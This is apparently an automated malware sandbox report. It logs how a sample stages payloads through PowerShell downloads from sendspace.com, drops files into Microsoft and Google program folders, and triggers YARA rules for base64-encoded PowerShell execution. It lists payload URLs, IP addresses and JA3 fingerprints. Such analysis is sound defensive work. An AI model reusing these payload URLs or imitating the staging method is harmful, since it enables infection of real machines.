Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 69.31.136.17 69.31.136.17
Source: Joe Sandbox View IP Address: 172.67.170.105 172.67.170.105
Source: Joe Sandbox View IP Address: 69.31.136.57 69.31.136.57
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n2.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n4.sendspace.comConnection: Keep-AliveCookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pro/dl/wlorhs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n2.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/g1h76h HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n4.sendspace.comConnection: Keep-AliveCookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs03n2.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs13n4.sendspace.com
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs03n2.sendspace.com
Source: wab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Au3Info_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Au3Info_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: AutoIt3_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBfq
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspaX
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
Source: wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: AutoIt3Help.exe.8.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/8
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2389809411.0000000021530000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/g1h76h
Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/g1h76hMU
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsP
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsXRwl
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_7844.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6465
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6489
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6465 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6489 Jump to behavior
Creates files inside the system directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8AAB16 2_2_00007FFD9B8AAB16
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8AB8C2 2_2_00007FFD9B8AB8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A0D35 2_2_00007FFD9B8A0D35
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
PE file contains executable resources (Code or Archives)
Source: AppVDllSurrogate.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: officeappguardwin32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: AppVLP.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: VC_redist.x64.exe.8.dr Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: integrator.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.8.dr Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.8.dr Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: upx.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe0.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: OLicenseHeartbeat.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: SciTE.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: grv_icons.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.8.dr Static PE information: Resource name: RT_ICON type: DitPack archive data
Source: javaws.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: GoogleCrashHandler.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver)
Source: GoogleCrashHandler64.exe.8.dr Static PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
Source: GoogleUpdateCore.exe.8.dr Static PE information: Resource name: RT_ICON type: Aarch64 COFF executable, not stripped, 66 sections, symbol offset=0x42aa70, 181 symbols, optional header size 43644, created Thu Jan 1 00:03:22 1970
Source: GoogleUpdateCore.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: pubs.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
PE file contains strange resources
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: misc.exe.8.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\200"
Source: misc.exe.8.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: pj11icon.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_MSB_FIRST
PE file overlay found
Source: SQLDumper.exe.8.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.8.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateCore.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.8.dr Static PE information: Data appended to the last section found
Source: dbcicons.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Data appended to the last section found
Source: osmclienticon.exe.8.dr Static PE information: Data appended to the last section found
Source: msoev.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdate.exe.8.dr Static PE information: Data appended to the last section found
Source: javaw.exe.8.dr Static PE information: Data appended to the last section found
Source: MsMpEng.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.8.dr Static PE information: Data appended to the last section found
Source: aimgr.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateBroker.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.8.dr Static PE information: Data appended to the last section found
Source: PerfBoost.exe.8.dr Static PE information: Data appended to the last section found
Source: javaws.exe.8.dr Static PE information: Data appended to the last section found
Source: aimgr.exe0.8.dr Static PE information: Data appended to the last section found
Source: Common.DBConnection.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: Data appended to the last section found
Source: SDXHelper.exe.8.dr Static PE information: Data appended to the last section found
Source: upx.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler.exe.8.dr Static PE information: Data appended to the last section found
Source: sscicons.exe.8.dr Static PE information: Data appended to the last section found
Source: armsvc.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVLP.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler64.exe.8.dr Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.8.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.8.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.8.dr Static PE information: Data appended to the last section found
Source: Wordconv.exe.8.dr Static PE information: Data appended to the last section found
Source: chrome.exe.8.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.8.dr Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.8.dr Static PE information: Data appended to the last section found
Source: java.exe.8.dr Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.8.dr Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: Data appended to the last section found
Source: grv_icons.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: Data appended to the last section found
Yara signature match
Source: amsi32_7844.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
